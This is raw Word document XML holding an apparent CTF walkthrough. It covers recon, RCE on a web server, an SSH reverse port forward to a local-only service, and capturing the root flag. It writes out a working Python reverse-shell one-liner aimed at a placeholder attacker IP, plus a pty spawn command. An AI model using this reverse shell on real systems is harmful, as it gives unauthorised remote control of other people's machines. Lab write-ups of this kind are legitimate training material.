    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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Every Penetration Test starts with Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5467350" cy="1504950"/>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4673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Noticed an open port on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check the port, we can tell that it is a web server</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3505200" cy="137160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505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8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The web server has RCE available, but current user has limited privilege. Let’s see if we can get root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking local service that is running on this computer, we notice another port that is only open locally. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netstat -ntlp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="15113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8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We cannot reach this local web server from our computer. One way we could expose this service to public is by using Port Forwarding. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since current web shell is very limited, we will spawn a reverse shell on this using python reverse shell cheat sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[YOUR IP]",[PORT NUMBER YOU ARE LISTENING]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you are listening on a port using netcat before launching python reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3686175" cy="552450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14"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6861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8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you’ve gained reverse shell, make sure you spawn tty shell with python because you will be using ssh which requires shell interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4781550" cy="1066800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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7815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8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import pty; pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we are ready to create reverse port forward with ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4848225" cy="1419225"/>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848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1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in password, and you’ve established a reverse ssh port forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now on your attacker machine, browse to localhost:2222 and you can access the local only web server with port forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4171950" cy="1504950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17"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4171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1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now just find the flag inwhoami root directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4362450" cy="1495425"/>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362450" cy="1495425"/>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10" name="image23.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer" id="0" name="image2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438150</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7781925" cy="409575"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapTopAndBottom distB="0" distT="0"/>
          <wp:docPr descr="footer" id="2" name="image13.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer" id="0" name="image1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descr="horizontal line" id="16" name="image29.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line" id="0" name="image29.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7" name="image20.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="short line" id="0" name="image20.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descr="horizontal line" id="8" name="image21.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line" id="0" name="image2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949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25.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netsec.ws/?p=337" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.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6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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8.png"/><Relationship Id="rId18"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